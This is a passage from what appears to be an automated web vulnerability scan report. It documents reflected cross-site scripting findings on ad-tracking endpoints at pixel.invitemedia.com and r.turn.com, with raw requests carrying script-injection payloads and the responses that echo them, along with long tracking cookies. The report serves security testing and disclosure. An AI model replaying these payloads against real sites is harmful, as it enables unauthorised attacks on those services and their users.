segments_p1="eJw1Uj1LQmEYTdN4uZM0Ci5tNTf2E8LFoKCpxaW1NagbRVEKBm4O0YeiZIRlSKl9ERVkoKVkZN6SBm8mVFRmJN33OU/LPZ7znudbxSomh2xtSoeYqpkMtAhBzKuZoM4A/Ung0ixca5rJ+AaNb4cIJcz0NktoFQcDBGf9pN5tQi33EdWojFVUxgiqvaTqE0j/zGXqnPKN8T0B/YP51yZ4Yxv8m/W5PPSFMLgnBfS9QA8UUX15HDSNadajZkURO1GzrR5p6hbDsOcg3zHg1EH2jAf2TNxssCzltoirklxCwYMK93GoWlGqj3HUrxTx+sSuLKN+yPOWgL8bPF8Wff50E23xOOot5KkeovN8nMX/I+UktouAU14qDTGiAzcYt2PIldgFT7Iv5UXufTuO6KRU2ojxdFTH0zHKnqiIOOXIcxVlL9xyR0cgl24j4NpJcXkn+Qox+G+C6KCkIu2DnTZWTcut1lh87SL4RBsNu1wOj9mKwHKATqddOPU+VB+on+mqixKEXcbv2ChJ553kyG0hXT6EjqvD8g+2ArFZRnhr0Nb2B9lxo48="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 14 Feb 2011 02:34:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 14-Feb-2011 02:34:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1076

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchbe085';alert(1)//2a45c87cfb4?admeld_adprovider_id=300&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1298082882&custom_user_segments=%2C11265%2C30211%2C8%2C28686%2C5379%2C24085%2C17440%2C28709%2C28710%2C39975%2C
...[SNIP]...

1.247. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/rubicon_sync

Issue detail

The value of the publisher_redirecturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a53e"><script>alert(1)</script>e268ea4feb8 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/6a53e"><script>alert(1)</script>e268ea4feb8 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"; subID="{}"; segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; segments_p1="eJw1Uj1LQmEYTdN4uZM0Ci5tNTf2E8LFoKCpxaW1NagbRVEKBm4O0YeiZIRlSKl9ERVkoKVkZN6SBm8mVFRmJN33OU/LPZ7znudbxSomh2xtSoeYqpkMtAhBzKuZoM4A/Ung0ixca5rJ+AaNb4cIJcz0NktoFQcDBGf9pN5tQi33EdWojFVUxgiqvaTqE0j/zGXqnPKN8T0B/YP51yZ4Yxv8m/W5PPSFMLgnBfS9QA8UUX15HDSNadajZkURO1GzrR5p6hbDsOcg3zHg1EH2jAf2TNxssCzltoirklxCwYMK93GoWlGqj3HUrxTx+sSuLKN+yPOWgL8bPF8Wff50E23xOOot5KkeovN8nMX/I+UktouAU14qDTGiAzcYt2PIldgFT7Iv5UXufTuO6KRU2ojxdFTH0zHKnqiIOOXIcxVlL9xyR0cgl24j4NpJcXkn+Qox+G+C6KCkIu2DnTZWTcut1lh87SL4RBsNu1wOj9mKwHKATqddOPU+VB+on+mqixKEXcbv2ChJ553kyG0hXT6EjqvD8g+2ArFZRnhr0Nb2B9lxo48="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 14 Feb 2011 01:34:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 14-Feb-2011 01:33:40 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 264

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/6a53e"><script>alert(1)</script>e268ea4feb8?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1298079240"/>
...[SNIP]...

1.248. http://r.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80a96"><script>alert(1)</script>331949a0040 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=80a96"><script>alert(1)</script>331949a0040&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=4thKjbT4Dd-wLmJ_EvL6OGUx_YihuVVYu3_TfrxVOxLfaqaDzVRu9ZiuBStYaftYPFbUXCL2UgT2Zh2i9n4bdmEFJK3PW8OZmgDnNcPWCfNI4E_LJGBd5ktc9D2EP3iXVzloyRtYmz5WwUlOqhgjJzRf6EtvPvPDy4qyJ60plhIiUcxVMkOk7W6GdnfN9Orwi4ny57OJZgTzL2FsqZrAh5fiWQZAKAOwRHx78cjQB8i-ExJ7_A4Q_x0WiDS5R8s4qPZYQ2rQpBVvfWWYpFe6URy2Vs2VdJ_TjWWvjLV9Q8m6hMviS8YTqb-ZiVtIUBjDzfzTwFruRQFMbT_NyCr5tmotZSQRzCZw0LF6c45BQQz09oHzZ-yryLJ8uFUm4TqTtHFDougM6qn-fCnFGGL4NPUNvmQnKSR_IW4vjpinnmSpjj2_u47YbamQM73IHCy9Sl0ZpaTYKgObLd08Gd0JoGuaLLHRZ-Ykz_TkIVZ9huoJ8VG9LN1TNKQM_NPsV2xeGHi3bYbGKGUdjPIU0cMPnGmxPU3XXT2arCgoL6Dn4SMbxfNR_y_fM9tMo0Ph6oeDvYYKlkyzNn3JdfPZgqqaIviA5QdTAVKvxsbfG_RiFigTLmpyQcn5PksmVWqu3SbN0VyR3eDASlHpj1bavPEOnrozydlNm_TE_r6icluVhvQE5Ov43rl2rHjKBgmJieXzPjWJq1kMte659Vcd5HhCaUJMqEVW9CddSG3ugiIvGpPb38PDFUA8hG6SKkVM5AiGw80gZu3yl7Vvk0bmhH4LCjjLMwDmJjRrWXjcO5EGZgy-ExJ7_A4Q_x0WiDS5R8s4BTpYXsHIzHlWqOeElAAexRy2Vs2VdJ_TjWWvjLV9Q8nWiYtrtggzf6QC_emGCUYHkAYZWo2P43mtp_vZfpxwURmMklWmLOsCWcBHbWrEHfnZfxRZofW-YLqIXc_XLzmrtHFDougM6qn-fCnFGGL4NAnCoYY7ACuNqpuJuqlD4PrpKdIl-vCs8PYIscXyY2wFHIA3ClafPQTXMYm0ZGX1lQ868DsJ8CzRL-qFZYXXGjnjVL9jGjuvVIAupi7jFNwmxmjWmZmvAOPnNuXsYJKsZcpAzSHYH88Cmpasf_VURFf22rMJNM9ndqYziU5Lic-QRj7a56PoySegU7HYB2c8HfiA5QdTAVKvxsbfG_RiFigezlWM8YZNRG9XfqIkin8k0VyR3eDASlHpj1bavPEOntPhusJqVFauiLy6UaFFc3PYmsvrCy4wt-d-LduEaGqhUO6VPDt67tRjGh2NpKtfx8Q-S6gpZovZHf4-kC6dIE7b38PDFUA8hG6SKkVM5AiG7G4qQXY8m01JE-wQyevARsbLIt6lxw4qn7zj9tJ2fQGJD8GhxX6KZrz-6lFiGJ-dRv8YUVgIig-grRaq4S8oT-Q_b1qUvkrI7hhBR8IjByfmHTKIVgzw0wJBikXj03WpHLZWzZV0n9ONZa-MtX1DyZl0YUseit0Cb3G_gMYpmfL9wJ-3B_7kL8dMqUjPBdPRS-kP3YQEvr7AqH2rw9rktoXdbV9sNJrU4cvKljWSeO20cUOi6Azqqf58KcUYYvg0eCIP4EeWu1tLqPD3KXyux9cg7-TCOBWwPvbOtAvH7FGTa5jgFaEbBx4OAtVXexdyPlxg9BhJfaBCNSYQ5Kq_-Sjtcg1-30-9Ex6CEY-Yr1gzbPQ4BjJufC2fQIZLJhJjTiug9ME9M3D4Hl8Eiw362GgMO-O5Hy-7BFA0JHw__mPd1M64cIluMfueZjPGlcvizzBrSDsidMXjw5kLBtnZH3sxbrc1XjPazF6bacT5OH5OfL6S5Ch8nYybd10IPcQ93hujX2-lUqQOZRz7lhE-Mp13Bx7SEoyCM4rv0PtWLZlDJuYINnvP4ltz0zwgi9RdBr-KLFRC4eQNwFThZDiSaEHYLoXdcf54MP-yW5BVHlvKRVBkBjUodw_dLB6IX2KDEvDFvZpoLKOIMM8vL4_UX54AJfo84MmNcJgucmF3a2rT3pH0CBj7HfwbEk4PHUhndSdvNmS_gGLRvueh6oi2M6aEMhx-btVOzA0hsRH2jLUVQcxEhmmaR_l3AS4SvhqrNqEcMkLIEPS56MjZCBdGPtsP2xTDqtDji7OeZPTeV4aXza8_gpDhhNfGv5kRzDqO8mTlK1zd_GN8J_C68v3vm6BzTfJiMvS8kl8QpS3DqrvGcnol-G-iOOCWmycV6dgRNwsJa0K7KBuioHn9OSA6OiovTKpiVvvksy9RWsNaBwlsK1sD2r9fBgo8cuHbz9o6Tiug9ME9M3D4Hl8Eiw362LLnvPdOAVRV_3-HFZurs-NwJI3B7sA3g7sDqxZPuDfgzzBrSDsidMXjw5kLBtnZH7oOoiCwaxJgx3v_OzDlP7JOfL6S5Ch8nYybd10IPcQ9X9Zc-e5Mnab9xws12uVaIR41EcKEDQON3vRYH1ZUr61GHZ56kCOvAMTmw-gDf-xHDkY3JWzdKEsukJ4BiXga1Q5GNyVs3ShLLpCeAYl4GtUORjclbN0oSy6QngGJeBrVn5kB8Bu8c7iHFAXgmGoiK5-ZAfAbvHO4hxQF4JhqIitAbIkJ3D687v0OZkfgvqhELnQlAE28n2DlyK7b-DFMmy50JQBNvJ9g5ciu2_gxTJuBUJX9pmSCLxiuzwYB86MTELbAFv_xsAvubJCJLlla0oa_uPyJAWAqD3ibcNxLhk9ZzfBU98RRGsiE7rLYAF7U0-lEpCQVO21AuaAn_6GWFjz7d-4JRCuozQQLfumpJSE1DAEFgyp5834TD56SR74-Gh_KZ4seqRyrSxDnYx6bbfvAdLEn8TgpYNDQOQBkNz_F4x9ydwRSyIlnBm5mjWTk2dsWUEe8YR0nRJ-RcjY4xKJY8_GDDsXZNc1xnOxIheEQaA4_4EDHKnfUnUEid2opeYGr2g6mjt8EkHand-oCrrsR_OIT6A1FqZldQLQBAfHRgcgF7FIdSZ5_87nT02pdOnckIzBPiMwCCKcMv-7LcniSJ_Z38uuHkYOliRcJOdbpoGbLCuvMNPg3cndaJwsK586AJWmQ44nwkhMoTIzPW2taqTWyyeGxhJe01tYYHhRwe50TGiQ4ayqZvxMwes0JcHudExokOGsqmb8TMHrNCYtqLln3rNkPy2fMYNItjb5p65N4NYIsxswLMnqfZzbqCZXHJ1GbJJRnbnm1mp0j6K931lLoYdbax2TZPhn7gigYHdiLIdqGJN4Fby-yTBP2ufYpAYQqKaBXZ3QHkktVEBQJcQBlsfrYmJhYACPhmlxrA0gThBUR_zElsqQPAsivSfXt6uuP7jvz9fgKyii_iYGj9voxAgcfPraiNme77-893dHG8TFoJbhrCrvd5u6DZXmYt3xjOemA4riPtg-VlcukHHk83m-gUQjwWqAerbhO6rTzKugJUqBqQ9F50l9JRxXHlVSYCTiFzrRayu0fCO6vLYbwbFb6diFeniXAnXYICxs_4rTchCin_F_gXJw3CAsbP-K03IQop_xf4FycNwgLGz_itNyEKKf8X-BcnDcICxs_4rTchCin_F_gXJw3SBYpq5h-OqNGCLdyjyYb4qyq4RHxj-sjEeXvEtPcPdY; fc=Q-i4UMc4QwIi-DRd9R6ia1J9_78D67FqFC0kV3tGd2QJJ7mWye14_2YpDYf2fGJzuDSye8dCcqjb55W88by2Y_lYn6WwWx8I_DeXmnM2x-jLDfaXqd7ordwJWxbMBXbCcEhYog6oHcMAxRPP4dyBk0paMt9KyzBYx_f8zOMt1_UkBxkTNTAXWm9kNSZlguLR5fjP49PUhu7v4L3sHsRyZQ; pf=W2lAvdO3UPK-67n93CR4V70h141EwRpVphJqTZeRapKuzdsXKOJykAJ3JxnPju9g5ehdKFP2wXAGuCUFv7XIPM0FzExGm1jv4Kvu640165OBvBXtoV0UQOpa27TXESVF-de5fP3AwoGiR_AIBPhToig1AM_gTSow1560pWbhh838I1Xi_FMkgIPwMPeBqodwgbWWL1_JBXWn8zgepH7BPbePalyqFZ93Lsfi8SgLVgTh-j-bH1npoySPlo-IWRvpNkaZBgGmnWJmvGYlVmPlSbHlSr1VTT1nlb50Fr5vj40NZDpqhun3lj0r0CvR0Vihm4m9vudXxCMFAjgeVFO5-xpIFGJioNw2vkEYe3YJ8emaUo3Hsp3jaymvGUlYuixmCOI3go4MrecUnPRzHm5YdxPKKY4kV-q2UJvSEkgnXksxeQb5A05wXSsD8Fj_F7za0NBQ4tKieMWx6gEN0MztGbK9Ye_wQX5bwuwz0ovjoTMcI4I2StnJ390lD_AvrOFoljQUjac8_W0UA2peA_VkfivKVPa-K620ApvhUtsRg48; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15018%7C15018%7C15018%7C15018%7Cundefined%7C15019%7C15018%7C15018%7C15018%7C15018%7C15019%7C15019%7C14983%7C15019%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 02:34:41 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 02:34:41 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=8838840790338793450&fpid=80a96"><script>alert(1)</script>331949a0040&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.249. http://r.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759fc"><script>alert(1)</script>eda4d1587f5 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=759fc"><script>alert(1)</script>eda4d1587f5&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=4thKjbT4Dd-wLmJ_EvL6OGUx_YihuVVYu3_TfrxVOxLfaqaDzVRu9ZiuBStYaftYPFbUXCL2UgT2Zh2i9n4bdmEFJK3PW8OZmgDnNcPWCfNI4E_LJGBd5ktc9D2EP3iXVzloyRtYmz5WwUlOqhgjJzRf6EtvPvPDy4qyJ60plhIiUcxVMkOk7W6GdnfN9Orwi4ny57OJZgTzL2FsqZrAh5fiWQZAKAOwRHx78cjQB8i-ExJ7_A4Q_x0WiDS5R8s4qPZYQ2rQpBVvfWWYpFe6URy2Vs2VdJ_TjWWvjLV9Q8m6hMviS8YTqb-ZiVtIUBjDzfzTwFruRQFMbT_NyCr5tmotZSQRzCZw0LF6c45BQQz09oHzZ-yryLJ8uFUm4TqTtHFDougM6qn-fCnFGGL4NPUNvmQnKSR_IW4vjpinnmSpjj2_u47YbamQM73IHCy9Sl0ZpaTYKgObLd08Gd0JoGuaLLHRZ-Ykz_TkIVZ9huoJ8VG9LN1TNKQM_NPsV2xeGHi3bYbGKGUdjPIU0cMPnGmxPU3XXT2arCgoL6Dn4SMbxfNR_y_fM9tMo0Ph6oeDvYYKlkyzNn3JdfPZgqqaIviA5QdTAVKvxsbfG_RiFigTLmpyQcn5PksmVWqu3SbN0VyR3eDASlHpj1bavPEOnrozydlNm_TE_r6icluVhvQE5Ov43rl2rHjKBgmJieXzPjWJq1kMte659Vcd5HhCaUJMqEVW9CddSG3ugiIvGpPb38PDFUA8hG6SKkVM5AiGw80gZu3yl7Vvk0bmhH4LCjjLMwDmJjRrWXjcO5EGZgy-ExJ7_A4Q_x0WiDS5R8s4BTpYXsHIzHlWqOeElAAexRy2Vs2VdJ_TjWWvjLV9Q8nWiYtrtggzf6QC_emGCUYHkAYZWo2P43mtp_vZfpxwURmMklWmLOsCWcBHbWrEHfnZfxRZofW-YLqIXc_XLzmrtHFDougM6qn-fCnFGGL4NAnCoYY7ACuNqpuJuqlD4PrpKdIl-vCs8PYIscXyY2wFHIA3ClafPQTXMYm0ZGX1lQ868DsJ8CzRL-qFZYXXGjnjVL9jGjuvVIAupi7jFNwmxmjWmZmvAOPnNuXsYJKsZcpAzSHYH88Cmpasf_VURFf22rMJNM9ndqYziU5Lic-QRj7a56PoySegU7HYB2c8HfiA5QdTAVKvxsbfG_RiFigezlWM8YZNRG9XfqIkin8k0VyR3eDASlHpj1bavPEOntPhusJqVFauiLy6UaFFc3PYmsvrCy4wt-d-LduEaGqhUO6VPDt67tRjGh2NpKtfx8Q-S6gpZovZHf4-kC6dIE7b38PDFUA8hG6SKkVM5AiG7G4qQXY8m01JE-wQyevARsbLIt6lxw4qn7zj9tJ2fQGJD8GhxX6KZrz-6lFiGJ-dRv8YUVgIig-grRaq4S8oT-Q_b1qUvkrI7hhBR8IjByfmHTKIVgzw0wJBikXj03WpHLZWzZV0n9ONZa-MtX1DyZl0YUseit0Cb3G_gMYpmfL9wJ-3B_7kL8dMqUjPBdPRS-kP3YQEvr7AqH2rw9rktoXdbV9sNJrU4cvKljWSeO20cUOi6Azqqf58KcUYYvg0eCIP4EeWu1tLqPD3KXyux9cg7-TCOBWwPvbOtAvH7FGTa5jgFaEbBx4OAtVXexdyPlxg9BhJfaBCNSYQ5Kq_-Sjtcg1-30-9Ex6CEY-Yr1gzbPQ4BjJufC2fQIZLJhJjTiug9ME9M3D4Hl8Eiw362GgMO-O5Hy-7BFA0JHw__mPd1M64cIluMfueZjPGlcvizzBrSDsidMXjw5kLBtnZH3sxbrc1XjPazF6bacT5OH5OfL6S5Ch8nYybd10IPcQ93hujX2-lUqQOZRz7lhE-Mp13Bx7SEoyCM4rv0PtWLZlDJuYINnvP4ltz0zwgi9RdBr-KLFRC4eQNwFThZDiSaEHYLoXdcf54MP-yW5BVHlvKRVBkBjUodw_dLB6IX2KDEvDFvZpoLKOIMM8vL4_UX54AJfo84MmNcJgucmF3a2rT3pH0CBj7HfwbEk4PHUhndSdvNmS_gGLRvueh6oi2M6aEMhx-btVOzA0hsRH2jLUVQcxEhmmaR_l3AS4SvhqrNqEcMkLIEPS56MjZCBdGPtsP2xTDqtDji7OeZPTeV4aXza8_gpDhhNfGv5kRzDqO8mTlK1zd_GN8J_C68v3vm6BzTfJiMvS8kl8QpS3DqrvGcnol-G-iOOCWmycV6dgRNwsJa0K7KBuioHn9OSA6OiovTKpiVvvksy9RWsNaBwlsK1sD2r9fBgo8cuHbz9o6Tiug9ME9M3D4Hl8Eiw362LLnvPdOAVRV_3-HFZurs-NwJI3B7sA3g7sDqxZPuDfgzzBrSDsidMXjw5kLBtnZH7oOoiCwaxJgx3v_OzDlP7JOfL6S5Ch8nYybd10IPcQ9X9Zc-e5Mnab9xws12uVaIR41EcKEDQON3vRYH1ZUr61GHZ56kCOvAMTmw-gDf-xHDkY3JWzdKEsukJ4BiXga1Q5GNyVs3ShLLpCeAYl4GtUORjclbN0oSy6QngGJeBrVn5kB8Bu8c7iHFAXgmGoiK5-ZAfAbvHO4hxQF4JhqIitAbIkJ3D687v0OZkfgvqhELnQlAE28n2DlyK7b-DFMmy50JQBNvJ9g5ciu2_gxTJuBUJX9pmSCLxiuzwYB86MTELbAFv_xsAvubJCJLlla0oa_uPyJAWAqD3ibcNxLhk9ZzfBU98RRGsiE7rLYAF7U0-lEpCQVO21AuaAn_6GWFjz7d-4JRCuozQQLfumpJSE1DAEFgyp5834TD56SR74-Gh_KZ4seqRyrSxDnYx6bbfvAdLEn8TgpYNDQOQBkNz_F4x9ydwRSyIlnBm5mjWTk2dsWUEe8YR0nRJ-RcjY4xKJY8_GDDsXZNc1xnOxIheEQaA4_4EDHKnfUnUEid2opeYGr2g6mjt8EkHand-oCrrsR_OIT6A1FqZldQLQBAfHRgcgF7FIdSZ5_87nT02pdOnckIzBPiMwCCKcMv-7LcniSJ_Z38uuHkYOliRcJOdbpoGbLCuvMNPg3cndaJwsK586AJWmQ44nwkhMoTIzPW2taqTWyyeGxhJe01tYYHhRwe50TGiQ4ayqZvxMwes0JcHudExokOGsqmb8TMHrNCYtqLln3rNkPy2fMYNItjb5p65N4NYIsxswLMnqfZzbqCZXHJ1GbJJRnbnm1mp0j6K931lLoYdbax2TZPhn7gigYHdiLIdqGJN4Fby-yTBP2ufYpAYQqKaBXZ3QHkktVEBQJcQBlsfrYmJhYACPhmlxrA0gThBUR_zElsqQPAsivSfXt6uuP7jvz9fgKyii_iYGj9voxAgcfPraiNme77-893dHG8TFoJbhrCrvd5u6DZXmYt3xjOemA4riPtg-VlcukHHk83m-gUQjwWqAerbhO6rTzKugJUqBqQ9F50l9JRxXHlVSYCTiFzrRayu0fCO6vLYbwbFb6diFeniXAnXYICxs_4rTchCin_F_gXJw3CAsbP-K03IQop_xf4FycNwgLGz_itNyEKKf8X-BcnDcICxs_4rTchCin_F_gXJw3SBYpq5h-OqNGCLdyjyYb4qyq4RHxj-sjEeXvEtPcPdY; fc=Q-i4UMc4QwIi-DRd9R6ia1J9_78D67FqFC0kV3tGd2QJJ7mWye14_2YpDYf2fGJzuDSye8dCcqjb55W88by2Y_lYn6WwWx8I_DeXmnM2x-jLDfaXqd7ordwJWxbMBXbCcEhYog6oHcMAxRPP4dyBk0paMt9KyzBYx_f8zOMt1_UkBxkTNTAXWm9kNSZlguLR5fjP49PUhu7v4L3sHsRyZQ; 